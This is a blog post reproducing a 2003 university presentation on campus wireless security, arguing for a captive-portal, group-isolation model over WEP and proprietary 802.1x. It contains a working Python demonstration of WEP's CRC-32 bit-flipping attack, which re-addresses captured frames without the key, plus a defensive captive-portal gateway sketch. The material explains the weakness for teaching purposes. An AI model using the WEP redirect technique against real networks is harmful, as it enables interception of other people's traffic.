Back in the Fall of 2003, PSU was still considering its wireless plans. Things were moving slowly, and the decision makers seemed to be looking for answers in the wrong places. I’d been agitating for better answers, a simpler solution, lower costs, and more progress. My criticism landed me on the hot seat, and I was soon asked to be more constructive. My answers are in this presentation, the accompanying handout, and a handout for a follow-up meeting.
At the time, the networking staff was leaning towards a proprietary 802.1x-based authentication scheme that required specific client software and had limited hardware support. The package was rather pricey, would have required additional client software and hardware purchases, and was restrictive in its support of student computers. At an institution that supports over 7,000 users, most of whom purchase and maintain their own equipment, the plan seemed to have a lot of shortcomings. I wanted the school to look at the Wireless ISP model, and consider the options used there. I also wanted the networking folks to explore network security overall, rather than just wireless security, as most network threats affect wired and wireless networks in similar ways.
I no longer work in the IT shop, where I was a sys admin at the time, but this presentation and my arguments may have been successful. The school selected a commercial captive portal authentication system, just like the WISPs. A lot has changed in the wireless market over the intervening year, but I’m offering the presentation here anyway.
Plymouth State University
IT Systems & Networking Staff
Security By Isolation
[graphic slides removed, see PDF]
Networked, But Isolated
- Group computers according to users and their activities
- Aggressive firewalling as appropriate by group
- Limit access to networks by group association
- Also to consider: NAT and NoCatAuth
Policy Based Networking
- Update our old ideas of ‘private’ and ‘public’ networks
- Make the logical structure of our network match our access and security policy
- Develop mechanisms to support and enforce this policy
- Attacks originating outside our network
- Attacks originating from within our network on targets here or elsewhere
- Man-in-the-middle; interception (sniffing) and manipulation of data en-route
- The Vandal
Denial of service, random damage, data loss
- The Brigand
Uses our resources in support of greater crimes
- The Thief
Data theft or manipulation
To Whom Are We Vulnerable?
- We fear miscreants and hackers
- Every user, authorized and unauthorized, is a potential threat
- Threats from ‘authorized’ users, while perhaps less likely, are more directed
Who Are We Trying to Serve?
- About 7,000 faculty, staff and students now have computer accounts and privileges here
- Do we trust every one of them? So…
- Any decisions about network security must be made with the recognition that we have a huge number of un-trusted users
- WEP is shared encryption…
- No matter how you distribute it or how often you change the key, all ‘authorized’ WEP users can see and sniff all other WEP ‘encrypted’ traffic
- …and you don’t even have to crack it…
- WEP protects each packet only with a linear CRC-32 integrity check, so a captured packet can be re-addressed without knowing the key: flip the ciphertext bits of the destination IP field, fix up the checksum, and re-send the packet through the AP
- The AP does the decryption and delivers the packet to a host of the attacker’s choosing on the wired network, so even unauthorized users can easily read traffic
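The two WEP failures above, as an added example that is not part of the original presentation: a toy WEP (RC4 keystream XOR, CRC-32 ICV, 3-byte IV, as in 802.11) with a constructed key, constructed addresses and a constructed payload. A second station holding the shared key reads a peer's frame outright, and an outsider with no key re-addresses a captured frame to a host of its choosing by flipping ciphertext bits and repairing the ICV through CRC-32's affine property. The attacker is assumed to be able to reconstruct the victim's IP header (addresses learned from cleartext ARP/DHCP, the remaining fields fixed or predictable); that assumption is stated in the code.

```python
import zlib

# --- toy WEP: RC4 keystream XOR, CRC-32 "ICV" for integrity (the 802.11 WEP design) ---

def rc4_keystream(key: bytes, n: int) -> bytes:
    """Plain RC4 KSA + PRGA; returns n keystream bytes."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """frame = iv || RC4(iv||key) XOR (plaintext || CRC32(plaintext))"""
    body = plaintext + zlib.crc32(plaintext).to_bytes(4, "little")
    return iv + xor(body, rc4_keystream(iv + key, len(body)))

def wep_decrypt(key: bytes, frame: bytes):
    """What the AP, or any station holding the shared key, does; None if the ICV fails."""
    iv, body = frame[:3], frame[3:]
    clear = xor(body, rc4_keystream(iv + key, len(body)))
    plaintext, icv = clear[:-4], clear[-4:]
    if zlib.crc32(plaintext).to_bytes(4, "little") != icv:
        return None
    return plaintext

# --- minimal IPv4 header so the redirect is realistic ---

def ipv4_checksum(header: bytes) -> int:
    """Ones'-complement sum; a header with a correct checksum sums to 0."""
    total = sum(int.from_bytes(header[i:i + 2], "big") for i in range(0, len(header), 2))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF

def ipv4_header(src: bytes, dst: bytes, payload_len: int, ident: int = 0x1234) -> bytes:
    h = bytearray(20)
    h[0] = 0x45                                    # version 4, IHL 5
    h[2:4] = (20 + payload_len).to_bytes(2, "big")
    h[4:6] = ident.to_bytes(2, "big")
    h[8], h[9] = 64, 17                            # TTL, protocol (UDP)
    h[12:16], h[16:20] = src, dst
    h[10:12] = ipv4_checksum(bytes(h)).to_bytes(2, "big")
    return bytes(h)

# --- the attack: re-address a captured frame without ever knowing the WEP key ---

def redirect_frame(frame: bytes, old_header: bytes, new_header: bytes) -> bytes:
    """ASSUMPTION: the attacker can reconstruct the victim's IP header (addresses
    come from cleartext ARP/DHCP, the other fields are fixed or predictable).
    The keystream is never recovered: the XOR difference is applied straight to the
    ciphertext, and the ICV is fixed up because CRC-32 is affine over XOR:
    crc(p ^ d) == crc(p) ^ crc(d) ^ crc(zeros)."""
    iv, body = frame[:3], frame[3:]
    plen = len(body) - 4
    delta = xor(old_header, new_header) + bytes(plen - len(old_header))
    icv_delta = (zlib.crc32(delta) ^ zlib.crc32(bytes(plen))).to_bytes(4, "little")
    return iv + xor(body, delta + icv_delta)

# --- constructed scenario: station A sends to SERVER; an outsider redirects it to ATTACKER ---

KEY = bytes([0x0B, 0xAD, 0xC0, 0xFF, 0xEE])       # 40-bit shared WEP key (constructed)
IV = b"\x00\x00\x01"
A, SERVER, ATTACKER = b"\x0a\x00\x00\x05", b"\x0a\x00\x00\x14", b"\x0a\x00\x00\x42"
PAYLOAD = b"user=alice&pass=hunter2"               # constructed application data

def scenario() -> dict:
    """Returns what each party ends up seeing."""
    header = ipv4_header(A, SERVER, len(PAYLOAD))
    frame = wep_encrypt(KEY, IV, header + PAYLOAD)

    # 1. Another 'authorized' station holds the same key: it simply decrypts.
    seen_by_peer = wep_decrypt(KEY, frame)

    # 2. An outsider with no key re-addresses the frame. The AP decrypts it,
    #    the ICV checks out, and the packet goes to ATTACKER on the wired side.
    new_header = ipv4_header(A, ATTACKER, len(PAYLOAD))
    forged = redirect_frame(frame, header, new_header)
    ap_output = wep_decrypt(KEY, forged)

    # 3. Flipping the address bits without fixing the ICV is what the ICV does catch.
    naive = forged[:-4] + frame[-4:]
    return {"peer": seen_by_peer, "ap_output": ap_output,
            "naive_rejected": wep_decrypt(KEY, naive) is None}

if __name__ == "__main__":
    r = scenario()
    print("peer read:", r["peer"][20:])
    print("AP forwards to", ".".join(map(str, r["ap_output"][16:20])), "payload", r["ap_output"][20:])
    print("naive flip rejected:", r["naive_rejected"])
```

The point for policy is in step 2: the ICV is the only thing standing between an outsider and a valid-looking packet, and it is linear, so the shared key buys no integrity at all. A real attacker has the extra chore of guessing the header fields correctly; the example hands them over to keep the mechanism visible.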
Is There An 802.11 Standard That Works?
- There is lots of activity to find a real solution to WEP’s failures, but…
- Interoperability is two to three years away
What Can We Do Now?
- First, we must recognize that many of the risks of wireless also exist on our wired network
- And, yes, wireless will always be less secure than wired communications
- With that in mind, let’s figure out how to secure our entire network
- Wireless Hacks by Rob Flickenger O’Reilly Press, 2003
- Network Magazine, CMP United Business Media
- Remember to be conscious of context: most of the work and reporting is directed at corporate users
Similar Service Models
- Because of the number and types of customers we serve, we’re more like a public service, a utility, an ISP
- We should look to WISPs — wireless internet service providers — for solutions
The WISP Model
- Low minimum requirements for client software and hardware — 802.11b wireless with recent browser
- Use ‘clientless’ authentication — enter credentials in secure web page
- Depend on application layer security, warn customers to do the same
- Is secure enough to prevent abuse and theft of service
What Is NoCatAuth?
- An open-source captive portal for network authentication and client management.
- Integrates DHCP, firewall, and authentication services.
- Uses web browser interface to take credentials, changes firewall behavior based on authentication. Looks for and reports ARP spoofing.
- Free for client and server; requires no additional client configuration.
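As an added example (not NoCatAuth's code; the group names, ports, addresses and credentials are constructed for illustration), the following Python sketches the gateway behaviour described under "What Is NoCatAuth?" together with the group-based access limits from "Networked, But Isolated": an unauthenticated client can reach only DNS and the portal and has its web traffic redirected, a web login binds the client's IP/MAC pair to a group, every packet is then judged against that group's policy, and an IP that turns up with a new MAC is reported rather than served.

```python
import time
from dataclasses import dataclass, field

PORTAL_IP = "10.1.0.1"                      # constructed portal address
# Constructed policy: services each group may reach once authenticated.
GROUP_POLICY = {
    "public":  {"udp/53", "tcp/80", "tcp/443"},                 # web only
    "student": {"udp/53", "tcp/80", "tcp/443", "tcp/22", "tcp/993"},
    "staff":   {"*"},                                           # any port
}
# Constructed subnets that only 'staff' may reach regardless of port.
RESTRICTED_NETS = ("10.1.50.",)

@dataclass
class Session:
    mac: str
    group: str
    expires: float

@dataclass
class Gateway:
    users: dict                                      # username -> (password, group); constructed store
    sessions: dict = field(default_factory=dict)     # ip -> Session
    arp_seen: dict = field(default_factory=dict)     # ip -> MAC first seen on the wire
    alerts: list = field(default_factory=list)

    def observe_arp(self, ip: str, mac: str) -> bool:
        """ARP watch: an IP that changes MAC is reported as possible spoofing."""
        prev = self.arp_seen.setdefault(ip, mac)
        if prev != mac:
            self.alerts.append(f"ARP spoof? {ip} was {prev}, now claims {mac}")
            return False
        return True

    def login(self, ip: str, mac: str, username: str, password: str,
              ttl: int = 3600, now: float = None):
        """Called by the HTTPS portal form; returns the group or None."""
        rec = self.users.get(username)
        if rec is None or rec[0] != password:       # a real portal checks a hash or RADIUS
            return None
        self.sessions[ip] = Session(mac, rec[1], (now or time.time()) + ttl)
        return rec[1]

    def decide(self, pkt: dict, now: float = None) -> str:
        """Firewall decision for one packet: 'allow', 'drop' or 'redirect'."""
        now = now or time.time()
        svc = f"{pkt['proto']}/{pkt['dport']}"
        sess = self.sessions.get(pkt["src_ip"])
        if sess and sess.expires < now:             # lease ran out: back to the portal
            del self.sessions[pkt["src_ip"]]
            sess = None
        if sess is None:
            # Unauthenticated: DNS and the portal itself pass so the browser can be
            # captured; other web traffic is redirected to the portal; the rest is dropped.
            if pkt["dst_ip"] == PORTAL_IP or svc == "udp/53":
                return "allow"
            return "redirect" if svc == "tcp/80" else "drop"
        if sess.mac != pkt["src_mac"]:              # someone else using an authenticated IP
            self.alerts.append(f"MAC mismatch for {pkt['src_ip']}: "
                               f"session {sess.mac}, packet {pkt['src_mac']}")
            return "drop"
        if pkt["dst_ip"].startswith(RESTRICTED_NETS) and sess.group != "staff":
            return "drop"
        allowed = GROUP_POLICY[sess.group]
        return "allow" if "*" in allowed or svc in allowed else "drop"

def demo() -> list:
    """Constructed walk-through; returns the sequence of decisions."""
    gw = Gateway(users={"alice": ("hunter2", "student"), "bob": ("s3cret", "staff")})
    web = {"src_ip": "10.1.0.50", "src_mac": "aa:aa", "dst_ip": "93.184.216.34",
           "proto": "tcp", "dport": 80}
    out = [gw.decide(web, now=1000)]                                   # redirect
    gw.login("10.1.0.50", "aa:aa", "alice", "hunter2", now=1000)
    out.append(gw.decide({**web, "dport": 443}, now=1000))             # allow
    out.append(gw.decide({**web, "dst_ip": "10.1.50.10"}, now=1000))  # drop (restricted)
    out.append(gw.decide({**web, "src_mac": "bb:bb"}, now=1000))       # drop + alert
    return out

if __name__ == "__main__":
    print(demo())
```

Two design notes. Binding the session to the IP/MAC pair is what makes the MAC-mismatch and ARP checks worth anything, and it is also the limit of the model: a client on an open network can still be impersonated by anyone who can forge both, which is why the WISP slide says to depend on application-layer security as well. The restricted-subnet rule shows the "policy-based networking" idea in miniature: the group a user authenticates into, not which cable or radio they arrive on, decides what they may reach.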